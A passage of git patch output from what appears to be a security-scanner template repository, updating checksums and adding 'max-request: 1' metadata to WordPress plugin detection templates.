+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
+http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
+http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
+http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
+http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
-http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
-http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
-http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
-http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
-http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
-http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
+http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
+http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
+http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
+http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
+http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
+http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
+http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
-http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
-http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
-http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
-http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
-http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
-http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
-http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
-http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
+http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
+http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
+http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
+http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
+http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
+http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
+http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
+http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
+http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
-http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
-http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
-http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
-http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
-http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
+http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
+http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
+http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
+http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
+http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7181,7 +7182,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:e1f570c41e2b71bf52d0d5f6bde7f87bfbc5f051
+templates-checksum.txt:3b6369678164dfa6f797db3b57b32773c5c20c56
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 4784f370c46bba40c3cffa3498d2020a2415a462 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 19 Sep 2023 08:23:16 +0000
Subject: [PATCH 0449/1090] TemplateMan Update [Tue Sep 19 08:23:16 UTC 2023]
 :robot:

---
 http/technologies/wordpress/plugins/ad-inserter.yaml             | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml              | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml       | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml  | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                 | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml          | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml     | 1 +
 http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml   | 1 +
 http/technologies/wordpress/plugins/amp.yaml                     | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml             | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml           | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml             | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml                | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml      | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml           | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml        | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                  | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml     | 1 +
 .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml          | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml         | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml            | 1 +
 http/technologies/wordpress/plugins/cmb2.yaml                    | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml                | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml           | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml             | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml      | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml         | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml           | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml      | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml     | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml            | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml     | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml        | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml       | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml              | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml       | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml           | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml  | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/elementor.yaml               | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml        | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml    | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml         | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml   | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml    | 1 +
 .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml       | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml       | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml                | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml              | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml            | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml           | 1 +
 http/technologies/wordpress/plugins/formidable.yaml              | 1 +
 http/technologies/wordpress/plugins/forminator.yaml              | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml     | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml  | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml     | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml        | 1 +
 http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml         | 1 +
 .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml              | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml               | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml  | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml            | 1 +
 http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml           | 1 +
 http/technologies/wordpress/plugins/health-check.yaml            | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml             | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml     | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                 | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml                | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml            | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml          | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml           | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml              | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml           | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                 | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml          | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                   | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                  | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml         | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml    | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml          | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml               | 1 +
 http/technologies/wordpress/plugins/loginpress.yaml              | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml        | 1 +
 http/technologies/wordpress/plugins/mailpoet.yaml                | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml             | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml            | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml        | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml                | 1 +
 http/technologies/wordpress/plugins/members.yaml                 | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml                | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml               | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml              | 1 +
 .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 +
 http/technologies/wordpress/plugins/nextgen-gallery.yaml         | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml             | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml             | 1 +
 http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml   | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml            | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml            | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml      | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml            | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml           | 1 +
 http/technologies/wordpress/plugins/polylang.yaml                | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml           | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml             | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml               | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml        | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml          | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml             | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml   | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml       | 1 +
 http/technologies/wordpress/plugins/redirection.yaml             | 1 +
 http/technologies/wordpress/plugins/redux-framework.yaml         | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml   | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml                | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml        | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml           | 1 +
 http/technologies/wordpress/plugins/sg-security.yaml             | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml     | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml            | 1 +
 .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml               | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml       | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml          | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml       | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml   | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml          | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml             | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml  | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml              | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml    | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml     | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml     | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml        | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml           | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml         | 1 +
 http/technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml             | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml            | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml        | 1 +
 .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml          | 1 +
 .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml            | 1 +
 .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml         | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml         | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml  | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml     | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml            | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml    | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml           | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml          | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml    | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml               | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml      | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml           | 1 +
 http/technologies/wordpress/plugins/worker.yaml                  | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml      | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml                | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml              | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml          | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml          | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml            | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml          | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml   | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml             | 1 +
 200 files changed, 200 insertions(+)

diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
